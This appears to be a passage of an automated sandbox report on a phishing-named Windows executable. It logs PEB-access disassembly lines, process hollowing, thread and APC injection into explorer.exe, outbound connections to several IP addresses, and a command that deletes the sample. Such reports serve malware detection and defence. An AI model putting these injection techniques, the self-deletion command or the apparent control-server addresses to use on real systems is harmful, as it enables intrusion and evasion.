          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 210.152.86.132 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.52.105.123 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.116.112.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 176.74.27.137 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.199.108.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 164.155.144.220 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.27.88.111 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeMemory written: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 330000
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: explorer.exe, 00000005.00000002.741529190.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.241586685.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.745817464.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
